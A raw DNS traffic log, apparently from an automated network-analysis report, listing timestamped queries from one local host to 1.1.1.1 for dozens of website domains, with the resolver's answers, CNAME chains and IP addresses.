                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.325349092 CEST192.168.2.31.1.1.10x76bStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:17.396720886 CEST192.168.2.31.1.1.10x4ac1Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:17.466051102 CEST192.168.2.31.1.1.10xf44aStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:17.592685938 CEST192.168.2.31.1.1.10x7efcStandard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:17.717149019 CEST192.168.2.31.1.1.10xcf81Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:18.641695976 CEST192.168.2.31.1.1.10xfbaeStandard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:18.747160912 CEST192.168.2.31.1.1.10x6fe5Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:18.875780106 CEST192.168.2.31.1.1.10x2bf4Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:18.921266079 CEST192.168.2.31.1.1.10x6cc2Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:19.702228069 CEST192.168.2.31.1.1.10xaab2Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.044467926 CEST192.168.2.31.1.1.10x47c4Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.273050070 CEST192.168.2.31.1.1.10x9e46Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.273279905 CEST192.168.2.31.1.1.10x7d80Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.273907900 CEST192.168.2.31.1.1.10x54e3Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.274058104 CEST192.168.2.31.1.1.10x7061Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.315521955 CEST192.168.2.31.1.1.10x5d71Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.315695047 CEST192.168.2.31.1.1.10xee77Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.315907955 CEST192.168.2.31.1.1.10x1c4cStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.316096067 CEST192.168.2.31.1.1.10x65ffStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.332047939 CEST192.168.2.31.1.1.10x9b27Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.332215071 CEST192.168.2.31.1.1.10x3404Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.386142969 CEST192.168.2.31.1.1.10x4c5Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.386517048 CEST192.168.2.31.1.1.10x3967Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.517124891 CEST192.168.2.31.1.1.10xfebdStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.567625046 CEST192.168.2.31.1.1.10x9c87Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.671657085 CEST192.168.2.31.1.1.10x937dStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.748800993 CEST192.168.2.31.1.1.10x7d41Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.826651096 CEST192.168.2.31.1.1.10x58cfStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.831306934 CEST192.168.2.31.1.1.10xcfccStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.831746101 CEST192.168.2.31.1.1.10x6c0cStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.920221090 CEST192.168.2.31.1.1.10xe13cStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:21.949378014 CEST192.168.2.31.1.1.10x4e55Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.025909901 CEST192.168.2.31.1.1.10x8665Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.026909113 CEST192.168.2.31.1.1.10x6381Standard query (0)mail.protonmail.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.177153111 CEST192.168.2.31.1.1.10xcafcStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.603605032 CEST192.168.2.31.1.1.10x3dc9Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.795378923 CEST192.168.2.31.1.1.10x6ab1Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.795419931 CEST192.168.2.31.1.1.10x75bdStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:22.894779921 CEST192.168.2.31.1.1.10x1239Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.419193029 CEST192.168.2.31.1.1.10x68adStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.426985025 CEST192.168.2.31.1.1.10x6d08Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.450279951 CEST192.168.2.31.1.1.10x7b92Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.655616999 CEST192.168.2.31.1.1.10xe09cStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.657404900 CEST192.168.2.31.1.1.10x9d31Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.873816967 CEST192.168.2.31.1.1.10x75bdStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.873850107 CEST192.168.2.31.1.1.10x6ab1Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:23.913105965 CEST192.168.2.31.1.1.10x2a63Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.276824951 CEST192.168.2.31.1.1.10x990dStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.496905088 CEST192.168.2.31.1.1.10x73fdStandard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.737483978 CEST192.168.2.31.1.1.10x9d31Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.786878109 CEST192.168.2.31.1.1.10x1c85Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.805893898 CEST192.168.2.31.1.1.10xd5eaStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.867216110 CEST192.168.2.31.1.1.10x8febStandard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.873317957 CEST192.168.2.31.1.1.10x6ab1Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:24.873336077 CEST192.168.2.31.1.1.10x75bdStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.635411024 CEST192.168.2.31.1.1.10x1fd8Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:25.917882919 CEST192.168.2.31.1.1.10x7396Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:26.968723059 CEST192.168.2.31.1.1.10xd3b0Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:26.968771935 CEST192.168.2.31.1.1.10x75bdStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:26.968797922 CEST192.168.2.31.1.1.10x6ab1Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:27.200309038 CEST192.168.2.31.1.1.10x9c34Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:27.861689091 CEST192.168.2.31.1.1.10x91e3Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.060280085 CEST192.168.2.31.1.1.10x83feStandard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.168965101 CEST192.168.2.31.1.1.10x4eb5Standard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.239624977 CEST192.168.2.31.1.1.10x8f1aStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.325748920 CEST192.168.2.31.1.1.10x914fStandard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.698533058 CEST192.168.2.31.1.1.10xb0fcStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.700879097 CEST192.168.2.31.1.1.10x312Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.701455116 CEST192.168.2.31.1.1.10x7948Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:28.971429110 CEST192.168.2.31.1.1.10x946fStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:29.686346054 CEST192.168.2.31.1.1.10x264dStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:29.809772015 CEST192.168.2.31.1.1.10x4feStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.393302917 CEST192.168.2.31.1.1.10x35a2Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.528269053 CEST192.168.2.31.1.1.10x7545Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:30.840835094 CEST192.168.2.31.1.1.10x90d8Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:31.029031992 CEST192.168.2.31.1.1.10x68dbStandard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:31.357119083 CEST192.168.2.31.1.1.10x131aStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:31.640615940 CEST192.168.2.31.1.1.10x3dbStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:31.640774012 CEST192.168.2.31.1.1.10x2261Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:32.872401953 CEST192.168.2.31.1.1.10x3dbStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:32.934446096 CEST192.168.2.31.1.1.10xf5e3Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:32.977408886 CEST192.168.2.31.1.1.10x32a9Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:33.537358999 CEST192.168.2.31.1.1.10xc054Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:33.649743080 CEST192.168.2.31.1.1.10x3c5fStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.332185030 CEST192.168.2.31.1.1.10x3dbStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.463762999 CEST192.168.2.31.1.1.10x903Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.464482069 CEST192.168.2.31.1.1.10x2eadStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.464958906 CEST192.168.2.31.1.1.10x51b8Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.473665953 CEST192.168.2.31.1.1.10xee20Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.486021996 CEST192.168.2.31.1.1.10x2fa7Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.486413002 CEST192.168.2.31.1.1.10x868eStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.567874908 CEST192.168.2.31.1.1.10x6fe2Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.569271088 CEST192.168.2.31.1.1.10x9bb2Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.605942965 CEST192.168.2.31.1.1.10xdd36Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:34.654057026 CEST192.168.2.31.1.1.10x3c5fStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:35.590493917 CEST192.168.2.31.1.1.10xdd36Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:36.325496912 CEST192.168.2.31.1.1.10x3dbStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:36.590399027 CEST192.168.2.31.1.1.10xdd36Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.714940071 CEST1.1.1.1192.168.2.30x14d8No error (0)www.ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.714940071 CEST1.1.1.1192.168.2.30x14d8No error (0)www.ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.716006041 CEST1.1.1.1192.168.2.30x8fd7No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.716006041 CEST1.1.1.1192.168.2.30x8fd7No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.716636896 CEST1.1.1.1192.168.2.30x7068No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.716636896 CEST1.1.1.1192.168.2.30x7068No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.717680931 CEST1.1.1.1192.168.2.30x2602No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.717680931 CEST1.1.1.1192.168.2.30x2602No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.718756914 CEST1.1.1.1192.168.2.30x17d5No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.718756914 CEST1.1.1.1192.168.2.30x17d5No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.848954916 CEST1.1.1.1192.168.2.30x6ad3No error (0)www.pdqhomes.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.848954916 CEST1.1.1.1192.168.2.30x6ad3No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.848954916 CEST1.1.1.1192.168.2.30x6ad3No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.848954916 CEST1.1.1.1192.168.2.30x6ad3No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.004179955 CEST1.1.1.1192.168.2.30x98cNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.012029886 CEST1.1.1.1192.168.2.30x6125No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.398920059 CEST1.1.1.1192.168.2.30x9a06No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.398920059 CEST1.1.1.1192.168.2.30x9a06No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.512897015 CEST1.1.1.1192.168.2.30x2a0No error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.512897015 CEST1.1.1.1192.168.2.30x2a0No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.512897015 CEST1.1.1.1192.168.2.30x2a0No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552100897 CEST1.1.1.1192.168.2.30x868fNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552100897 CEST1.1.1.1192.168.2.30x868fNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552100897 CEST1.1.1.1192.168.2.30x868fNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.815565109 CEST1.1.1.1192.168.2.30x88aNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.815565109 CEST1.1.1.1192.168.2.30x88aNo error (0)ghs.googlehosted.com142.250.189.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.135438919 CEST1.1.1.1192.168.2.30xd47bNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.135438919 CEST1.1.1.1192.168.2.30xd47bNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.247613907 CEST1.1.1.1192.168.2.30xd589No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.247613907 CEST1.1.1.1192.168.2.30xd589No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.247613907 CEST1.1.1.1192.168.2.30xd589No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.267558098 CEST1.1.1.1192.168.2.30xd286No error (0)www.petsfan.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.267558098 CEST1.1.1.1192.168.2.30xd286No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.267558098 CEST1.1.1.1192.168.2.30xd286No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.267558098 CEST1.1.1.1192.168.2.30xd286No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.502135038 CEST1.1.1.1192.168.2.30xdd9bName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.511784077 CEST1.1.1.1192.168.2.30xb1beNo error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.648868084 CEST1.1.1.1192.168.2.30xbc51No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.648868084 CEST1.1.1.1192.168.2.30xbc51No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.648868084 CEST1.1.1.1192.168.2.30xbc51No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.698146105 CEST1.1.1.1192.168.2.30x40c2No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.860496998 CEST1.1.1.1192.168.2.30x7370No error (0)www.wkhk.net34.94.160.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.860543013 CEST1.1.1.1192.168.2.30x7370No error (0)www.wkhk.net34.94.160.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.860560894 CEST1.1.1.1192.168.2.30x7370No error (0)www.wkhk.net34.94.160.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.102737904 CEST1.1.1.1192.168.2.30xa33eNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.102737904 CEST1.1.1.1192.168.2.30xa33eNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.403493881 CEST1.1.1.1192.168.2.30xcb9bNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.403493881 CEST1.1.1.1192.168.2.30xcb9bNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.049068928 CEST1.1.1.1192.168.2.30x2efeNo error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.049068928 CEST1.1.1.1192.168.2.30x2efeNo error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.343296051 CEST1.1.1.1192.168.2.30x7966No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.343296051 CEST1.1.1.1192.168.2.30x7966No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.728765965 CEST1.1.1.1192.168.2.30x8e24No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.728765965 CEST1.1.1.1192.168.2.30x8e24No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.840190887 CEST1.1.1.1192.168.2.30x3f1No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.840190887 CEST1.1.1.1192.168.2.30x3f1No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.840190887 CEST1.1.1.1192.168.2.30x3f1No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.928668022 CEST1.1.1.1192.168.2.30x3f1No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.928668022 CEST1.1.1.1192.168.2.30x3f1No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.928668022 CEST1.1.1.1192.168.2.30x3f1No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.220207930 CEST1.1.1.1192.168.2.30x62abNo error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.220207930 CEST1.1.1.1192.168.2.30x62abNo error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.231352091 CEST1.1.1.1192.168.2.30xd9c3No error (0)www.iamdirt.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.231352091 CEST1.1.1.1192.168.2.30xd9c3No error (0)ghs.googlehosted.com142.250.217.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.232640028 CEST1.1.1.1192.168.2.30xafd8No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.232640028 CEST1.1.1.1192.168.2.30xafd8No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.232640028 CEST1.1.1.1192.168.2.30xafd8No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
